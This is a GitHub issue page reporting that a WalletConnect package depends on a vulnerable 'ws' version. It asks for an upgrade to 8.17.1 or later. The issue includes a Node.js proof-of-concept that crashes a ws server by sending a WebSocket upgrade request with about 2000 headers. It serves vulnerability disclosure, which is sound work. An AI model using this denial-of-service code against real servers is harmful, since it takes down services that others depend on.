Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Vulnerable ws dependency causing DoS vulnerability #4705

Open
josadcha opened this issue Jun 27, 2024 · 1 comment
Open

Vulnerable ws dependency causing DoS vulnerability #4705

josadcha opened this issue Jun 27, 2024 · 1 comment
Labels
type: bug Something isn't working

Comments

@josadcha
Copy link

Describe the bug
The @walletconnect/jsonrpc-ws-connection package depends on a vulnerable version of the ws package (^7.5.1). This vulnerability allows a Denial of Service (DoS) attack by sending a request with many HTTP headers, exceeding the server.maxHeadersCount threshold and causing the server to crash.

SDK Version (if relevant)

  • Client: JS
  • Version 2.13.3

To Reproduce
Steps to reproduce the behavior:

  1. Set up a project with the @walletconnect/jsonrpc-ws-connection package.
  2. Use the following proof of concept code to send a request with excessive headers: (from Dependabot):
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Expected behavior
The @walletconnect/jsonrpc-ws-connection package should depend on a non-vulnerable version of the ws package (>=8.17.1). The server should handle requests with many HTTP headers gracefully without crashing.

Screenshots
N/A

Desktop (please complete the following information):

  • OS: [e.g. iOS]
  • Browser [e.g. chrome, safari]
  • Version [e.g. 22]

Smartphone (please complete the following information):

  • Device: [e.g. iPhone6]
  • OS: [e.g. iOS8.1]
  • Browser [e.g. stock browser, safari]
  • Version [e.g. 22]

Additional context
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230
@josadcha josadcha added the type: bug Something isn't working label Jun 27, 2024
@linear Linear
Copy link

linear bot commented Jun 27, 2024

CR-94 Vulnerable `ws` dependency causing DoS vulnerability

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
type: bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@josadcha